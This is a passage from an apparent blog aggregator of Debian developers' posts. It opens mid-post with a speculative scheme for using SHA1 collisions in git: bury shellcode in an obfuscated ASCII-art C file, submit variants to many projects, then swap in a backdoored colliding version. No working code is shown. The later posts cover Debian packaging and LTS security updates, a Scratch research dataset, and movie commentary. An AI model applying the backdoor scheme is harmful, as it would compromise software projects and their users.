Now, you need a C ofuscation person, to make that backdoor a little less obvious. (Hint: Add code to to fix the newlines, paint additional ASCII sprites over top of the static art, etc, add animations, and bury the shellcode in there.) After a little work, you'll have a C file that any project would like to add, to be able to display a great easter egg ASCII art. Submit it to a project. Submit different versions of it to 100 projects! Everything after line 3 can be edited to make lots of different versions targeting different programs. Once a project contains the first 3 lines of the file, followed by anything at all, it contains a SHA1 collision, from which you can generate the bad version by swapping in the bad data chuck. You can then replace the good file with the bad version here and there, and noone will be the wiser (except the easter egg will display the "bad" first line before it roots them). Now, how much more expensive would this be than today's SHA1 attack? It needs a way to generate collisions using only printable ASCII. Whether that is feasible depends on the implementation details of the SHA1 attack, and I don't really know. I should stop writing this blog post and read the rest of the paper. You can pick either of these two lessons to take away:
  1. ASCII art in code is evil and unsafe. Avoid it at any cost. apt-get moo
  2. Git's security is getting broken to the point that ASCII art (and a few hundred thousand dollars) is enough to defeat it.

My work today investigating ways to apply the SHA1 collision to git repos (not limited to this blog post) was sponsored by Thomas Hochstein on Patreon.

4 February 2017

Markus Koschany: My Free Software Activities in January 2017

Welcome to gambaru.de. Here is my monthly report that covers what I have been doing for Debian. If you re interested in Java, Games and LTS topics, this might be interesting for you. Debian Games
  • In January 2017 we had the last chance to get new upstream releases into the next stable release of Debian 9 aka Stretch. Hence I packaged new versions of pygame-sdl2, renpy, fife, unknown-horizons, redeclipse and redeclipse-data and also backported Red Eclipse to Jessie.
  • I uploaded fifechan to unstable and applied an upstream patch to fix a segmentation fault (#852247) in Unknown Horizons.
  • Package cleanups and improvements: freeorion (#843538), I enabled support for mips64el again; I tidied up gtkatlantic, powermanga, lincity-ng, opencity and tecnoballz; I applied a patch from Reiner Herrmann to make the build of netpanzer reproducible (#827150); In spring I changed the build-dependency of asciidoc to asciidoc-base (#850387) although it turned out later that this wasn t strictly needed. I also removed ConvertUTF8 related code from spring because it might be non-free. I don t think this is necessarily true but I didn t want to argue with Lintian in this case.
  • I sponsored a new upstream release of pentobi for Juhani Numminen.
  • I backported minetest 0.4.5 to jessie-backports and fixed #851114, which I think was not really an issue since we already provide the font sources in Debian and Minetest depends on the respective package.
  • I triaged RC bug #847812 in pysolfc, provided a patch and reassigned the issue to src:pillow. Apparently this affected a lot more 32 bit applications written in Python.
Debian Java Debian LTS This was my eleventh month as a paid contributor and I have been paid to work 12,75 hours on Debian LTS, a project started by Rapha l Hertzog. In that time I did the following:
  • From 16. January until 22. January I was in charge of our LTS frontdesk. I triaged security issues in imagemagick, wordpress, hesiod, opus, mysql-5.5, netbeans, groovy and zoneminder.
  • DLA-779-1. Issued a security update for Tomcat 7 fixing 1 CVE and a regression when running Tomcat with SecurityManager enabled.
  • DLA-761-2. Issued a regression update for python-bottle. (Debian bug #850176).
  • DLA-781-1 and DLA-781-2. Issued a security update for Asterisk fixing 2 CVE after I had prepared the package last month. Later Brad Barnett discovered a regression when using SIP communication and provided assistance with debugging the issue. I corrected this one in DLA-781-2.
  • DLA-792-1. Issued a security update for libphp-swiftmailer fixing 1 CVE.
  • DLA-793-1. Issued a security update for opus fixing 1 CVE.
  • DLA-794-1. Issued a security update for groovy fixing 1 CVE.
  • DLA-797-1. Issued a security update for mysql-5.5 fixing 10 CVE. The update was prepared by Lars Tangvald.
  • DLA-813-1. Issued a security update for wordpress fixing 9 CVE.
Misc
  • In xarchiver (#850103) I added binutils to the list of suggested packages, in iftop (#850040) I applied a patch from Brian Russell and I packaged a new upstream release of mediathekview, a Java application to watch and download broadcasts from German television stations. I had to make some major packaging changes because the build system switched from Ant to Gradle but there were fewer issues than expected.

3 February 2017

Benjamin Mako Hill: New Dataset: Five Years of Longitudinal Data from Scratch

Scratch is a block-based programming language created by the Lifelong Kindergarten Group (LLK) at the MIT Media Lab. Scratch gives kids the power to use programming to create their own interactive animations and computer games. Since 2007, the online community that allows Scratch programmers to share, remix, and socialize around their projects has drawn more than 16 million users who have shared nearly 20 million projects and more than 100 million comments. It is one of the most popular ways for kids to learn programming and among the larger online communities for kids in general.
Front page of the Scratch online community (https://scratch.mit.edu) during the period covered by the dataset.
Since 2010, I have published a series of papers using quantitative data collected from the database behind the Scratch online community. As the source of data for many of my first quantitative and data scientific papers, it s not a major exaggeration to say that I have built my academic career on the dataset. I was able to do this work because I happened to be doing my masters in a research group that shared a physical space ( The Cube ) with LLK and because I was friends with Andr s Monroy-Hern ndez, who started in my masters cohort at the Media Lab. A year or so after we met, Andr s conceived of the Scratch online community and created the first version for his masters thesis project. Because I was at MIT and because I knew the right people, I was able to get added to the IRB protocols and jump through the hoops necessary to get access to the database. Over the years, Andr s and I have heard over and over, in conversation and in reviews of our papers, that we were privileged to have access to such a rich dataset. More than three years ago, Andr s and I began trying to figure out how we might broaden this access. Andr s had the idea of taking advantage of the launch of Scratch 2.0 in 2013 to focus on trying to release the first five years of Scratch 1.x online community data (March 2007 through March 2012) most of the period that the codebase he had written ran the site. After more work than I have put into any single research paper or project, Andr s and I have published a data descriptor in Nature s new journal Scientific Data. This means that the data is now accessible to other researchers. The data includes five years of detailed longitudinal data organized in 32 tables with information drawn from more than 1 million Scratch users, nearly 2 million Scratch projects, more than 10 million comments, more than 30 million visits to Scratch projects, and much more. The dataset includes metadata on user behavior as well the full source code for every project. Alongside the data is the source code for all of the software that ran the website and that users used to create the projects as well as the code used to produce the dataset we ve released. Releasing the dataset was a complicated process. First, we had navigate important ethical concerns about the the impact that a release of any data might have on Scratch s users. Toward that end, we worked closely with the Scratch team and the the ethics board at MIT to design a protocol for the release that balanced these risks with the benefit of a release. The most important features of our approach in this regard is that the dataset we re releasing is limited to only public data. Although the data is public, we understand that computational access to data is different in important ways to access via a browser or API. As a result, we re requiring anybody interested in the data to tell us who they are and agree to a detailed usage agreement. The Scratch team will vet these applicants. Although we re worried that this creates a barrier to access, we think this approach strikes a reasonable balance. Beyond the the social and ethical issues, creating the dataset was an enormous task. Andr s and I spent Sunday afternoons over much of the last three years going column-by-column through the MySQL database that ran Scratch. We looked through the source code and the version control system to figure out how the data was created. We spent an enormous amount of time trying to figure out which columns and rows were public. Most of our work went into creating detailed codebooks and documentation that we hope makes the process of using this data much easier for others (the data descriptor is just a brief overview of what s available). Serializing some of the larger tables took days of computer time. In this process, we had a huge amount of help from many others including an enormous amount of time and support from Mitch Resnick, Natalie Rusk, Sayamindu Dasgupta, and Benjamin Berg at MIT as well as from many other on the Scratch Team. We also had an enormous amount of feedback from a group of a couple dozen researchers who tested the release as well as others who helped us work through through the technical, social, and ethical challenges. The National Science Foundation funded both my work on the project and the creation of Scratch itself. Because access to data has been limited, there has been less research on Scratch than the importance of the system warrants. We hope our work will change this. We can imagine studies using the dataset by scholars in communication, computer science, education, sociology, network science, and beyond. We re hoping that by opening up this dataset to others, scholars with different interests, different questions, and in different fields can benefit in the way that Andr s and I have. I suspect that there are other careers waiting to be made with this dataset and I m excited by the prospect of watching those careers develop. You can find out more about the dataset, and how to apply for access, by reading the data descriptor on Nature s website.

1 February 2017

Lars Wirzenius: Hacker Noir, chapter 2: Development setup phase

It is a new month, and time to publish the next chapter in Hacker Noir. This is chapter 2, titled "Development setup phase". I hope you enjoy it. Feedback via email, irc, identi.ca, twitter are welcome. Or come talk to me at FOSDEM if you're there.

22 January 2017

Lars Wirzenius: Improving debugging via email, followup

Half a year ago I wrote a blog post about debugging over email. This is a follow-up. The blog post summarised:
  • Have an automated way to collect all usual informaion needed for debugging: versions, config and log files, etc.
  • Improve error messages so the users can solve their issues themselves.
  • Give users better automated diagnostics tools.
Based on further thinking and feedback, I add:
  • When a program notices a problem that may indicate a bug in it, it should collect the necessary information itself, automatically, in a way that the user just needs to send to the developers / support.
  • The primary goal should be to help people solve their own problems.
  • A secondary goal is to make the problem reproducible by the developers, or otherwise make it easy to fix bugs without access to the original system where the problem was manifested.
I've not written any code to help with this remote debugging, but it's something I will start experimenting with in the near future. Further ideas welcome.

19 January 2017

Daniel Pocock: Which movie most accurately forecasts the Trump presidency?

Many people have been scratching their heads wondering what the new US president will really do and what he really stands for. His alternating positions on abortion, for example, suggest he may simply be telling people what he thinks is most likely to win public support from one day to the next. Will he really waste billions of dollars building a wall? Will Muslims really be banned from the US? As it turns out, several movies provide a thought-provoking insight into what could eventuate. What's more, these two have a creepy resemblance to the Trump phenomenon and many of the problems in the world today. Countdown to Looking Glass On the classic cold war theme of nuclear annihilation, Countdown to Looking Glass is probably far more scary to watch on Trump eve than in the era when it was made. Released in 1984, the movie follows a series of international crises that have all come to pass: the assassination of a US ambassador in the middle east, a banking crisis and two superpowers in an escalating conflict over territory. The movie even picked a young Republican congressman for a cameo role: he subsequently went on to become speaker of the house. To relate it to modern times, you may need to imagine it is China, not Russia, who is the adversary but then you probably won't be able to sleep after watching it. cleaning out the swamp? The Omen Another classic is The Omen. The star of this series of four horror movies, Damien Thorn, appears to have a history that is eerily reminiscent of Trump: born into a wealthy family, a series of disasters befall every honest person he comes into contact with, he comes to control a vast business empire acquired by inheritance and as he enters the world of politics in the third movie of the series, there is a scene in the Oval Office where he is flippantly advised that he shouldn't lose any sleep over any conflict of interest arising from his business holdings. Did you notice Damien Thorn and Donald Trump even share the same initials, DT?

Next.

Previous.